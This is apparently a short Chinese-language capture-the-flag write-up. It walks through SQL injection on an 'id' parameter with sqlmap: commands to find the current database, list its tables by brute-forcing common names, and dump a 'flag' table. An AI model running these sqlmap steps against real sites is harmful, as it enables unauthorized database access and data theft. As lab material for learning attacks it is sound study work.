注入点是id,使用工具sqlmap,链接https://sqlmap.org/
1、找数据库,运行:
python sqlmap.py -u url --current-db --level 5
获得当前的数据库:
2、找表:
python sqlmap.py -u url -D sqli --tables
会提示information_shema不能用,是否使用common table(用字典爆破,猜测应该是通过延时或返回的content-length长度),输入y (截图是找columns的,方式一样)。
找到了flag表
3、找columns
运行:
python sqlmap.py -u url -D sqli -T flag --dump level 5
得到flag的结果。